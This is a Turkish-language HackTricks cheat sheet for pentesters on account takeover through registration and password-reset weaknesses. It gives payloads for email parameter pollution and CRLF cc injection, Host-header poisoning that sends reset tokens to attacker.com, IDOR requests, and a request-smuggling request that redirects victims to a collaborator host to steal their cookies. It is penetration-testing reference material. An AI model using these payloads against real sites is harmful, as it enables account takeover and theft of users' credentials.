hacktricks/pentesting-web/registration-vulnerabilities.md

# Kayıt ve Ele Geçirme Zafiyetleri

<details>

<summary><strong>AWS hacklemeyi sıfırdan kahramanla öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>

HackTricks'i desteklemenin diğer yolları:

* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* Hacking hilelerinizi göndererek **HackTricks** ve **HackTricks Cloud** github depolarına **PR göndererek** paylaşın.

</details>

## Kayıt Ele Geçirme

### Yinelemeli Kayıt

* Var olan bir kullanıcı adı kullanarak oluşturmayı deneyin
* E-postayı değiştirerek kontrol edin:
* büyük harf
* \+1@
* e-postada nokta ekleyin
* e-posta adında özel karakterler (%00, %09, %20)
* E-postadan sonra siyah karakterler ekleyin: `test@test.com a`
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com

### Kullanıcı Adı Sorgulama

Uygulama içinde bir kullanıcı adının zaten kaydedilip kaydedilmediğini bulmaya çalışın.

### Şifre Politikası

Bir kullanıcı oluştururken şifre politikasını kontrol edin (zayıf şifreler kullanabilir misiniz).\
Bu durumda kimlik bilgilerini kaba kuvvet saldırısıyla deneyebilirsiniz.

### SQL Enjeksiyonu

Kayıt formlarında hesap ele geçirme veya bilgi çalma girişimlerinde bulunmak için **SQL Enjeksiyonları** hakkında bilgi almak için [**bu sayfayı kontrol edin**](sql-injection/#insert-statement).

### Oauth Ele Geçirmeleri

{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}

### SAML Zafiyetleri

{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
{% endcontent-ref %}

### E-posta Değiştirme

Kayıt olduktan sonra e-postayı değiştirmeyi deneyin ve bu değişikliğin doğru bir şekilde doğrulandığını veya keyfi e-postalara değiştirilebileceğini kontrol edin.

### Diğer Kontroller

* **Geçici e-postaları** kullanıp kullanamayacağınızı kontrol edin
* **Uzun** **şifre** (>200), **DoS**'a neden olur
* Hesap oluşturma üzerindeki **hız sınırlarını kontrol edin**
* username@**burp\_collab**.net kullanın ve **geri çağrıyı** analiz edin

## **Şifre Sıfırlama Ele Geçirmesi**

### Şifre Sıfırlama Jetonu Referrer Üzerinden Sızıntı <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. E-posta adresinize şifre sıfırlama isteği gönderin
2. Şifre sıfırlama bağlantısına tıklayın
3. Şifreyi değiştirmeyin
4. Herhangi bir 3. taraf web sitesine tıklayın (örneğin: Facebook, twitter)
5. Burp Suite proxy'de isteği yakalayın
6. Referer başlığının şifre sıfırlama jetonunu sızdırıp sızdırmadığını kontrol edin.

### Şifre Sıfırlama Zehirlenmesi <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Şifre sıfırlama isteğini Burp Suite'de yakalayın
2. Burp Suite'de aşağıdaki başlıkları ekleyin veya düzenleyin: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Değiştirilmiş başlıkla isteği yönlendirin\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. _host başlığına_ dayalı bir şifre sıfırlama URL'si arayın: `https://attacker.com/reset-password.php?token=TOKEN`

### E-posta Parametresi Aracılığıyla Şifre Sıfırlama <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
### API Parametrelerinde IDOR <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>

1. Saldırgan, kendi hesabıyla giriş yapmalı ve **Şifre Değiştirme** özelliğine gitmelidir.
2. Burp Suite'i başlatın ve isteği Intercept edin.
3. İsteği repeater sekmesine gönderin ve parametreleri düzenleyin: Kullanıcı Kimliği/e-posta\
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`

### Zayıf Şifre Sıfırlama Jetonu <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>

Şifre sıfırlama jetonu her seferinde rastgele oluşturulmalı ve benzersiz olmalıdır.\
Jetonun süresinin dolup dolmadığını veya her zaman aynı olup olmadığını belirlemeye çalışın, bazı durumlarda üretim algoritması zayıf olabilir ve tahmin edilebilir. Aşağıdaki değişkenler algoritma tarafından kullanılabilir.

* Zaman damgası
* Kullanıcı Kimliği
* Kullanıcının E-postası
* Ad ve Soyad
* Doğum Tarihi
* Kriptografi
* Sadece sayı
* Küçük jeton dizisi (A-Z, a-z, 0-9 arasındaki karakterler)
* Jeton yeniden kullanımı
* Jetonun süresi dolma tarihi

### Şifre Sıfırlama Jetonunun Sızdırılması <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>

1. API/UI kullanarak belirli bir e-posta için şifre sıfırlama isteği tetikleyin, örneğin: test@mail.com
2. Sunucu yanıtını inceleyin ve `resetToken` için kontrol edin.
3. Ardından, `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]` gibi bir URL'de jetonu kullanın.

### Kullanıcı Adı Çakışmasıyla Şifre Sıfırlama <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>

1. Sisteme, kurbanın kullanıcı adıyla aynı olan bir kullanıcı adıyla kaydolun, ancak kullanıcı adının önüne ve/veya arkasına boşluk ekleyin. Örneğin: `"admin "`
2. Kötü niyetli kullanıcı adıyla bir şifre sıfırlama isteği yapın.
3. E-postanıza gönderilen jetonu kullanarak kurbanın şifresini sıfırlayın.
4. Yeni şifreyle kurban hesabına bağlanın.

CTFd platformu bu saldırıya karşı savunmasızdı.\
Bkz: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)

### Cross Site Scripting ile Hesap Ele Geçirme <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>

1. Uygulama içinde veya çerezlerin üst etki alanına sahip bir alt etki alanında XSS bulun.
2. Mevcut **oturum çerezini** sızdırın.
3. Çerez kullanarak kullanıcı olarak kimlik doğrulayın.

### HTTP İstek Smuggling ile Hesap Ele Geçirme <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>

1\. HTTP İstek Smuggling türünü (CL, TE, CL.TE) tespit etmek için **smuggler** kullanın\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. Aşağıdaki verilerle `POST / HTTP/1.1`'i üzerine yazacak bir istek oluşturun:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` kurbanları burpcollab'a yönlendirerek çerezlerini çalma amacıyla\
3\. Son istek aşağıdaki gibi görünebilir
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X
```
Bu hata Hackerone raporları tarafından sömürülmüştür:
* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)
* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)

### CSRF ile Hesap Ele Geçirme <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>

1. CSRF için bir payload oluşturun, örneğin: "Parola değişikliği için otomatik gönderimli HTML formu"
2. Payload'ı gönderin

### JWT ile Hesap Ele Geçirme <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>

JSON Web Token, bir kullanıcının kimlik doğrulaması için kullanılabilir.

* JWT'yi başka bir Kullanıcı Kimliği / E-posta ile düzenleyin
* Zayıf JWT imzasını kontrol edin

{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
{% endcontent-ref %}

## Referanslar

* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)

<details>

<summary><strong>AWS hacklemeyi sıfırdan kahraman olacak şekilde öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

HackTricks'i desteklemenin diğer yolları:

* Şirketinizi HackTricks'te **reklamınızı görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** paylaşın.

</details>